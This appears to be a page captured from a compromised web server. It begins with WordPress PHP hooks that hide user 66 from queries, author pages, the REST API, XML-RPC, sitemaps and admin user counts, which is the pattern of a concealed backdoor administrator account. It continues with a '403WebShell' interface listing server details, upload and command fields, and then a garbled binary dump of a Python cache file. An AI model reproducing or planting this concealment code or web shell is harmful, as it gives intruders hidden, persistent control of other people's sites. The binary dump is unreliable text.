add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/self/root/usr/lib/python3.12/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/usr/lib/python3.12/__pycache__/fnmatch.cpython-312.pyc
�

:5jo��|�dZddlZddlZddlZddlZgd�Zd�Zejdd��d��Zd	�Z	d
�Z
d�Zy)a�Filename matching with shell patterns.

fnmatch(FILENAME, PATTERN) matches according to the local convention.
fnmatchcase(FILENAME, PATTERN) always takes case in account.

The functions operate by translating the pattern into a regular
expression.  They cache the compiled regular expressions for speed.

The function translate(PATTERN) returns a regular expression
corresponding to PATTERN.  (It does not compile it.)
�N)�filter�fnmatch�fnmatchcase�	translatec��tjj|�}tjj|�}t||�S)a�Test whether FILENAME matches PATTERN.

    Patterns are Unix shell style:

    *       matches everything
    ?       matches any single character
    [seq]   matches any character in seq
    [!seq]  matches any char not in seq

    An initial period in FILENAME is not special.
    Both FILENAME and PATTERN are first case-normalized
    if the operating system requires it.
    If you don't want this, use fnmatchcase(FILENAME, PATTERN).
    )�os�path�normcaser)�name�pats  �/usr/lib/python3.12/fnmatch.pyrrs9���7�7���D�!�D�
�'�'�
�
�3�
�C��t�S�!�!�i�T)�maxsize�typedc��t|t�r$t|d�}t|�}t|d�}nt|�}t	j
|�jS)Nz
ISO-8859-1)�
isinstance�bytes�strr�re�compile�match)r�pat_str�res_str�ress    r
�_compile_patternr&sK���#�u���c�<�(���G�$���G�\�*����n��
�:�:�c�?� � � rc�L�g}tjj|�}t|�}tjtur#|D]}||�s�|j|��|S|D]9}|tjj|��s�)|j|��;|S)zJConstruct a list from those elements of the iterable NAMES that match PAT.)rr	r
r�	posixpath�append)�namesr�resultrrs     r
rr0s���
�F�
�'�'�
�
�3�
�C��S�!�E�	�w�w�)���	$�D��T�{��
�
�d�#�	$��M��	$�D��R�W�W�%�%�d�+�,��
�
�d�#�	$��Mrc�,�t|�}||�duS)z�Test whether FILENAME matches PATTERN, including case.

    This is a version of fnmatch() which doesn't case-normalize
    its arguments.
    N)r)rrrs   r
rr@s��
�S�!�E���;�d�"�"rc�f�t�}g}|j}dt|�}}||k�r||}|dz}|dk(r|r|d|u�r�||��n�|dk(r
|d��n�|dk(�r�|}||kr
||dk(r|dz}||kr
||d	k(r|dz}||kr||d	k7r|dz}||kr	||d	k7r�||k\r
|d
��nq|||}d|vr|jdd
�}n�g}	||dk(r|dzn|dz}
	|j	d|
|�}
|
dkrn|	j|||
�|
dz}|
dz}
�8|||}|r|	j|�n
|	dxxdz
cc<tt|	�dz
dd�D]4}
|	|
dz
d|	|
dkDs�|	|
dz
dd|	|
ddz|	|
dz
<|	|
=�6dj
d�|	D��}tjdd|�}|dz}|s	|d�nS|dk(r	|d�nE|ddk(r	d|ddz}n|ddvrd|z}|d|�d	��n|tj|��||kr��||k(sJ�|}g}|j}dt|�}}||kr$|||ur|||�|dz
}||kr|||ur�||kr�|||usJ�|dz
}||k(r	|d�nv|||usJ�g}
||kr-|||ur&|
j||�|dz
}||kr|||ur�&dj
|
�}
||k(r|d�||
�n|d|
�d��||kr��||k(sJ�dj
|�}d|�d�S)zfTranslate a shell PATTERN to a regular expression.

    There is no way to quote meta-characters.
    r��*����?�.�[�!�]z\[�-�\�\\��Nc3�`K�|]&}|jdd�jdd����(y�w)r,r-r+z\-N)�replace)�.0�ss  r
�	<genexpr>ztranslate.<locals>.<genexpr>�s0����%6�)*�&'�Y�Y�t�U�%;�%C�%C�C��%O�%6�s�,.z([&~|])z\\\1z(?!)�^)r5r(z.*�z(?>.*?�)z(?s:z)\Z)
�objectr�lenr1�find�range�joinr�sub�escape)r�STARr�add�i�n�c�j�stuff�chunks�k�chunk�inp�fixeds              r
rrJs
���8�D�
�C�

�*�*�C��c�#�h�q�A�
�a�%���F��
�a�C����8��C��G�4�/��D�	�
�#�X���H�
�#�X��A��1�u��Q��3���a�C���1�u��Q��3���a�C���a�%�C��F�c�M��a�C���a�%�C��F�c�M��A�v��E�
��A�a����e�#�!�M�M�$��6�E��F�"�1�v��}��!��!�A�#�A���H�H�S�!�Q�/���q�5�!��
�
�c�!�A�h�/��a�C���a�C��
� ��!�H�E���
�
�e�,��r�
�c�)�
�"�3�v�;�q�=�!�R�8�*��!�!�A�#�;�r�?�V�A�Y�q�\�9�*0��1��+�c�r�*:�V�A�Y�q�r�]�*J�F�1�Q�3�K� &�q�	�*� �H�H�%6�.4�%6�6�E����z�7�E�:���a�C�����K��c�\���H��Q�x�3�� #�e�A�B�i����q��Z�/� $�u����!�E�7�!��%���	�	�!����a�%�@
��6�M�6��C�
�C�

�*�*�C��c�#�h�q�A�
�a�%�C��F�$�&��C��F��	�Q����a�%�C��F�$�&��a�%��1�v��~��~�	�Q�����6���I���1�v�T�!�!�!����!�e��A��d�*��L�L��Q�� �
��F�A��!�e��A��d�*���������6���I���J��&���q�!�"�!�a�%�"
��6�M�6�
�'�'�#�,�C��3�%�s��r)�__doc__rrr�	functools�__all__r�	lru_cacherrrr�rr
�<module>rPsU��
�
��	��
;��"�&����U�$�/�!�0�!�� #�or

Youez - 2016 - github.com/yon3zu
LinuXploit